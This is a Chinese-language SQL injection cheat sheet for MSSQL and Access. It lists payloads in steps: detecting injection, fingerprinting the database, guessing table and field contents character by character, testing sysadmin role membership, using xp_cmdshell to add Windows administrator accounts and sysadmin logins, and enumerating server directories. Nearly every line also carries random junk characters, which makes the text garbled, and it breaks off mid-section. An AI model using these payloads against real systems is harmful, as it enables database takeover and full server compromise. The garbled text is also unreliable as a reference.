1.判断是否有注入;and 1=1 ;and 1=2 hBfzU\*0H
2.初步判断是否是mssql ;and user>0 pZ_FVID
ZB^4 (F')H
3.注入参数是字符'and [查询条件] and ''=' :E >n)_^
7>2j=Y_Kp
4.搜索时没过滤参数的'and [查询条件] and '%25'=' S"KTL *9D
~\)&{'
5.判断数据库系统 d'AviW>
E9Xk8w'+
;and (select count(*) from sysobjects)>0 mssql :WfB!4%!
B1d%#
;and (select count(*) from msysobjects)>0 access }d~FTre
@8<uAu%
L"[wa.<
1&@wb'MBs.
6.猜数据库 ;and (select Count(*) from [数据库名])>0 "mP*}VF
p=`x
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 hml\^I8Q>F
i3kI2\bd/
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #Rm=Em}d
@Pb 1QLiz
9.(1)猜字段的ascii值(access) d"d)<f
%\{?(baOA
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 Eps\iykB
tFST.yT>zg
(2)猜字段的ascii值(mssql) bJ,=yB+0
eZ.0,A*1B1
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 MY<!\4/
AXU!-er$
10.测试权限结构(mssql) Acq>M^E3
^0ZKHR(}e
j=jrzG+`
HyX4ob[X
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- eR*
]<0=
#`#aSqGmc
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- dW^_tzfF7
oIL+@}u7
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- qiKtR
5.K$
X$+7}
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ETWmeMN
zWmo
OnK
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- w`#0
Y9O
m/F(h-?
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Zz)oMw
\I,Dje/:w
;and 1=(select IS_MEMBER('db_owner'));-- g2 {?EP
i;'X}KW
_F|_C5A
p4t!T=o/
11.添加mssql和系统的帐户 ^a#&wW
Q0"F> %Cn
;exec master.dbo.sp_addlogin username;-- fddbXs0Sn
;exec master.dbo.sp_password null,username,password;-- QWW7I.9r
(Q]Y>
'
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 4\'81"ei
Z=t#*"J
;exec master.dbo.xp_cmdshell 'net user username password #&2N,M!Q
sv{0XVn+^
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ^Lv^W
%J (
}D7-,
;exec master.dbo.xp_cmdshell 'net user username password /add';-- b} U&bFl
9Or4`JOO
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- GwpBDMk
m2<
*
soVZz3F
teS0F
12.(1)遍历目录 h, 6S$,UI
.'2gJ"?,
;create table dirs(paths varchar(100), id int) dR, NC-*
ZNC?Ntw
;insert dirs exec master.dbo.xp_dirtree 'c:\' /2\=sTd
nIqY}??
;and (select top 1 paths from dirs)>0 ttq< )4
M>H^<N}'A
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) 0)Xue9AS
cLko
'SD|ObBY
Y <i}"eI*
(2)遍历目录 -MW(={#
Y./}zCT
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- RdVis|7o
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 K\E]X\:
4C9"Q,o%&
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 :8|3V~%m
*Qwhi&k
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 KRR^?
<